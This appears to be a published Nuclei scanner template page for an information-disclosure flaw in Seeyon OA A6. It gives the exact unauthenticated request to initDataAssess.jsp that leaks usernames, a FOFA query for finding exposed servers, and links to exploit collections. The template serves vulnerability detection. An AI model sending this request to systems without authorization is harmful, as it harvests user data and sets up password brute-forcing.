Skip to content

Seeyon OA A6 initDataAssess.jsp - Information Disclosure

ID: seeyon-initdata-exposure

Severity: medium

Author: SleepingBag945

Tags: seeyon,oa,info-leak

Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information, attacker can use the obtained username to blast the user’s password to enter the background for further attacks.

id: seeyon-initdata-exposure
info:
name: Seeyon OA A6 initDataAssess.jsp - Information Disclosure
author: SleepingBag945
severity: medium
description: |
Seeyon OA A6 initDataAssess.jsp has leaked user sensitive information, attacker can use the obtained username to blast the user's password to enter the background for further attacks.
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20initDataAssess.jsp%20%E7%94%A8%E6%88%B7%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
metadata:
verified: true
max-request: 1
fofa-query: body="yyoa" && app="致远互联-OA"
tags: seeyon,oa,info-leak
http:
- raw:
- |
GET /yyoa/assess/js/initDataAssess.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "personList"
- "personHash.Add"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100a28777721a0349d1975f71995c25df5dbbb251f7e240e84735fe1857dd75c0f5022100847673b0cb7a53a427a5f9a9c4cbd9f69d39aed2ac9f46978df86ac49c86c0ac:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml"

View on Github